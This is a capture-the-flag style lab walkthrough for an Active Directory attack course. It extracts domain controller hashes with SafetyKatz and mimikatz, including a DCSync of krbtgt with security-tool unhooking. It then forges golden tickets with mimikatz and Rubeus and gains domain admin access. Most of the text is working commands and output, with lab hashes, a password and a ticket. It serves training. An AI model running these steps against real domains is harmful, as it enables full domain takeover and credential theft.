Learning Object 8
Tasks
1 – Extract secrets from the domain controller of dollarcorp
2 – Using the secrets of krbtgt account, create a Golden ticket
3 – Use the Golden ticket to (once again) get domain admin privileges from a machine
Flag 16 [dcorp-dc] – NTLM hash of krbtgt 🚩
Flag 17 [dcorp-dc] – NTLM hash of domain administrator – Administrator 🚩
Solutions
1 – Extract secrets from the domain controller of dollarcorp
Starting to previous learning object 7 lab, we’ve already domain admin privileges, let’s extract all the hashes on the domain controller (the command need to be executed from a process running with privileges of DA on the student VM).
Starting opening a new cmd as administrator and starting a new process as svcadmin’s user:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /pttAuthentication Id : 0 ; 86511 (00000000:000151ef)
Session : Service from 0
User Name : svcadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 1/10/2025 9:28:52 AM
SID : S-1-5-21-719815819-3726368948-3917688648-1118
* Username : svcadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : *ThisisBlasphemyThisisMadness!!
* Key List :
aes256_hmac 6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011
aes128_hmac 8c0a8695795df6c9a85c4fb588ad6cbd
rc4_hmac_nt b38ff50264b74508085d82c69794a4d8
rc4_hmac_old b38ff50264b74508085d82c69794a4d8
rc4_md4 b38ff50264b74508085d82c69794a4d8
rc4_hmac_nt_exp b38ff50264b74508085d82c69794a4d8
rc4_hmac_old_exp b38ff50264b74508085d82c69794a4d8
Run the below commands from the process running as DA to copy Loader.exe on dcorp-dc and use it to extract credentials:
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
winrs -r:dcorp-dc cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.34
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-lsa /patch" "exit"RID : 000001f4 (500)
User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : 4e9815869d2090ccfca61c1fe0d23986
RID : 00000459 (1113)
User : sqladmin
LM :
NTLM : 07e8be316e3da9a042a9cb681df19bf5
RID : 0000045a (1114)
User : websvc
LM :
NTLM : cc098f204c5887eaa8253e7c2749156f
RID : 0000045b (1115)
User : srvadmin
LM :
NTLM : a98e18228819e8eec3dfa33cb68b0728
RID : 0000045d (1117)
User : appadmin
LM :
NTLM : d549831a955fee51a43c83efb3928fa7
RID : 0000045e (1118)
User : svcadmin
LM :
NTLM : b38ff50264b74508085d82c69794a4d8
RID : 0000045f (1119)
User : testda
LM :
NTLM : a16452f790729fa34e8f3a08f234a82c
RID : 00000460 (1120)
User : mgmtadmin
LM :
NTLM : 95e2cd7ff77379e34c6e46265e75d754
RID : 00000461 (1121)
User : ciadmin
LM :
NTLM : e08253add90dccf1a208523d02998c3d
RID : 00000462 (1122)
User : sql1admin
LM :
NTLM : e999ae4bd06932620a1e78d2112138c6
RID : 00001055 (4181)
User : studentadmin
LM :
NTLM : d1254f303421d3cdbdc4c73a5bce0201
RID : 000042cd (17101)
User : devopsadmin
LM :
NTLM : 63abbf0737c59a3142175b1665cd51ee
RID : 00005079 (20601)
User : student861
LM :
NTLM : 13c291a48547b0dedc67dc560aa02430
--snip--
RID : 000050cb (20683)
User : DCORP-STD863$
LM :
NTLM : fe6a068e0679afacfd5fe4a7652d2ca3
RID : 000050cc (20684)
User : DCORP-STD864$
NTLM : 4e9815869d2090ccfca61c1fe0d23986
To get NTLM hash and AES keys of the krbtgt account, we can use the DCSync attack. Run the below command from process running as Domain Admin on the student VM:
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt" "exit".
C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt "exit"
C:\Users\svcadmin>C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt "exit"
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "lsadump::evasive-dcsync /user:dcorp\krbtgt "exit"
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : http://127.0.0.1:8080/SafetyKatz.exe Arguments : lsadump::evasive-dcsync /user:dcorp\krbtgt exit
.#####. mimikatz 2.2.0 (x64) #19041 Nov 5 2024 21:52:02
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::evasive-dcsync /user:dcorp\krbtgt exit
[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502
Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd
* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80
* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 a0e60e247b498de4cacfac3ba615af01
--snip
29 40b43724fa76e22b0d610d656fb49ddd
mimikatz #
2 – Using the secrets of krbtgt account, create a Golden ticket
We can create a golden ticket using the following Mimikatz command:
We use PowerView to get the Get-DomainSID
It worked for me. Change the rc4 value , Try with this:
C:\AD\Tools\mimikatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt" "exit"
.
PS C:\ad\Tools> C:\AD\Tools\mimikatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:cifs /rc4:257fb099fb950e071677df6b58112a33 /ptt
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 257fb099fb950e071677df6b58112a33 - rc4_hmac_nt
Service : cifs
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 11/12/2025 5:17:22 AM ; 11/10/2035 5:17:22 AM ; 11/10/2035 5:17:22 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ dollarcorp.moneycorp.local' successfully submitted for current session
mimikatz(commandline) # exit
Bye!
PS C:\ad\Tools> klist
Current LogonId is 0:0x251f9416
Cached Tickets: (5)
#0> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 11/12/2025 5:10:26 (local)
End Time: 11/12/2025 15:10:26 (local)
Renew Time: 11/19/2025 5:10:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 11/12/2025 5:02:24 (local)
End Time: 11/12/2025 15:02:24 (local)
Renew Time: 11/19/2025 5:02:24 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x2 -> DELEGATION
Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
#2> Client: Administrator @ dollarcorp.moneycorp.local
Server: krbtgt/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 11/12/2025 5:01:09 (local)
End Time: 11/10/2035 5:01:09 (local)
Renew Time: 11/10/2035 5:01:09 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
#3> Client: Administrator @ dollarcorp.moneycorp.local
Server: cifs/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 11/12/2025 5:17:22 (local)
End Time: 11/10/2035 5:17:22 (local)
Renew Time: 11/10/2035 5:17:22 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
#4> Client: Administrator @ dollarcorp.moneycorp.local
Server: HTTP/dcorp-dc @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 11/12/2025 5:02:24 (local)
End Time: 11/12/2025 15:02:24 (local)
Renew Time: 11/19/2025 5:02:24 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called: dcorp-dc.dollarcorp.moneycorp.local
PS C:\ad\Tools> dir \\dcorp-dc.dollarcorp.moneycorp.local\c$
Directory: \\dcorp-dc.dollarcorp.moneycorp.local\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/16/2025 8:48 AM Azure ATP Sensor Setup
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 1/16/2025 8:49 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 4/1/2025 8:44 AM Users
d----- 1/5/2025 11:40 PM Windows
-a---- 11/17/2024 12:19 AM 36392 Microsoft.Tri.Sensor.Deployment.Deployer.exe
PS C:\ad\Tools>
.
We can also create a golden ticket using the following Rubeus command:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:{krbtgt hash} /sid:{Get-DomainSID} /ldap /user:{impersonated user} /printcmd
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /printcmd
C:\AD\Tools\Loader.exe Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:727 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORDC:\AD\Tools\Loader.exe Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD
now we need to add this command as argument to Loader and forge a Golden ticket addingC:\AD\Tools\Loader.exe -path and /ptt at the end of the generated command to inject it in the current process:
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args evasive-golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:152 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt.
c:\Users\student98>C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:34:22 AM" /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
[+] Successfully unhooked ETW!
[+++] NTDLL.DLL IS UNHOOKED!
[+++] KERNEL32.DLL IS UNHOOKED!
[+++] KERNELBASE.DLL IS UNHOOKED!
[+++] ADVAPI32.DLL IS UNHOOKED!
[+] URL/PATH : C:\AD\Tools\Rubeus.exe Arguments : Evasive-Golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:11/11/2022 6:34:22 AM /minpassage:1 /logoncount:233 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt
[*] Action: Build TGT
[*] Building PAC
[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)
[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : 154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : dollarcorp.moneycorp.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'Administrator@dollarcorp.moneycorp.local'
[*] AuthTime : 10/22/2025 2:00:00 AM
[*] StartTime : 10/22/2025 2:00:00 AM
[*] EndTime : 10/22/2025 12:00:00 PM
[*] RenewTill : 10/29/2025 2:00:00 AM
[*] base64(ticket.kirbi):
doIGJDCCBiCgAwIBBaEDAgEWooIE3jCCBNphggTWMIIE0qADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3JwLm1vbmV5Y29ycC5sb2NhbKOC
BHowggR2oAMCARKhAwIBA6KCBGgEggRkrnDfcO2kAVyyNS1MIdCkvmCbUvQQUNUp8rkVjIiNLwjszHre
IM90jbfnSBTYWyYnyCDfAiEoplvLQVEekYo80zKcglAjzpioRwee/Qo7RQV0mH9Xs3+MovvBfAM4XhjX
GJQpCar3dX5s1nOZT2AMWrNnMAjshS+zCxaoUqf8C9AFTQkg/95z6dKdtJ51/A/0BH5UK830swLnzJ0O
/EEWjVgY2FAbtLXAF0DGdpugKlAdmJVZomf8FcZJF0P+nr08xVKp/LczG9Kz7nRIlrms+iZpnAOSWAnj
WBFVKa7gcRkjGRd3/lQ8gZnQeAav1r8exujpkUL86HxhjjreIDhwR09P5NVQGMTteUdzJy4Yljvjb0kz
crN36WIDdJNx/Rq3VJOlg3iHgJwTQlSpu3DFJWOLlW3Y5U2MYvcCy1IhsbkTrxHkEfnsfhvKbWJkitbl
vO87Op1ClcHwodP/PkPBtnBaV3v9CoPVZJhgFsGdMdSHgoVmO9gUNtfElq7Zre9A7881QST1CDzDt9Ja
VBBsCamYkkP2mjDkty9KJYzHbry4n8EGjl+MRwu76sJqDfZApMx1cg/h6X1YTBUJ6+4zWc/lhJbDQ2ji
qN9/zI7BuNpBMavugje09Fm6WcXZOiBajOlKbIXAVKk6V5HO3BQ8cXRd/32SZ7odwii4ErV/rpgViegx
oJisfhw6c9Fc+bExBKaSOOgJSr3gZ5aZ27Qg88OaaVtO8Xg5zotE3N6lp4inE6fMgRATed3qmVTozQO9
nfuoEr96J1h+ziiCb2ALT5xpwhhWZB+TP3pGUfmXwQiHxa0TGTcfnJLDLBBh9UKTxpwfvQ2fSmKXZp9m
V00OzH6RMYt+NgHwpkYHeifIbEX+svmT/2S0oRrTxaDaPWWoWVST8klA8DH6VZVeV5sh8FBuV5pUumhO
XFWBpmV1yvJbY4V9h1KpPRTlOR+5o8MVy9q9wnpW41uKijj2xW48IB77pgdnopw1p76ry8QvHBWJCDjZ
rTke9RLYSTCpv7RI28Afx/wCoxBT3IWPVH673UuHGhkP2ILOip6vIMeROLsJR5PuhsQr4eA5ViWorHB+
sJ5NP59YkxacnpDBikPJD9I1XN1WoXTO/D6gYuMEMtAerfH57yTyX8FHYXMGvXqW0dDLHClIJW0kNtp6
Zcpt+ZchAg8upKc+b2l21rr4sx0+PZgnfiIwsxOg7dLbuPbOIybLyRX25YkH4ex5QrMwNsWRPCFf6TJy
CMKUfZy1VQNG+PdHxPO1lKGWLWHM6dEZPQnK/dWQCLcNlimBb8nRQjLrtf0Q7OH+5483J0oxv07bW3O0
2Z/vS/Z9vPzL4cH28Kw3HxfX9LICPSc/HSrNxl43Tc0ZkaSU0LU/9xASYVKd8JyDP4WxH3ELNLGTi+iw
s25wvMe2NW1Uns+dl9AGGgA8iZpCzVIUKyFD7VC366WvTnyl3lIlMZRhbNXKiG5DB7IQb9te5luhX9+o
VIMg9WBrop+jggEwMIIBLKADAgEAooIBIwSCAR99ggEbMIIBF6CCARMwggEPMIIBC6ArMCmgAwIBEqEi
BCBOcM0W2jbvGGAcD1A/DWZWIlJu0dJ20vnnP1GKwH3lcKEcGxpET0xMQVJDT1JQLk1PTkVZQ09SUC5M
T0NBTKIaMBigAwIBAaERMA8bDUFkbWluaXN0cmF0b3KjBwMFAEDgAACkERgPMjAyNTEwMjIwOTAwMDBa
pREYDzIwMjUxMDIyMDkwMDAwWqYRGA8yMDI1MTAyMjE5MDAwMFqnERgPMjAyNTEwMjkwOTAwMDBaqBwb
GkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMqS8wLaADAgECoSYwJBsGa3JidGd0Gxpkb2xsYXJjb3Jw
Lm1vbmV5Y29ycC5sb2NhbA==
[+] Ticket successfully imported!
c:\Users\student98>klist
Current LogonId is 0:0x13e40310
Cached Tickets: (1)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 10/22/2025 2:00:00 (local)
End Time: 10/22/2025 12:00:00 (local)
Renew Time: 10/29/2025 2:00:00 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
c:\Users\student98>
3 – Use the Golden ticket to (once again) get domain admin privileges from a machine
After importing golden ticket, we can access and check our privileges
winrs -r:dcorp-dc cmd
set username
set computername
Flag 16 [dcorp-dc] – NTLM hash of krbtgt 🚩
NTLM : 4e9815869dXXXXXXXXXXXXXXXXXXXX
Flag 17 [dcorp-dc] – NTLM hash of domain administrator – Administrator 🚩
NTLM : af0686XXXXXXXXXXXXXXXXXXXXXXXXXXX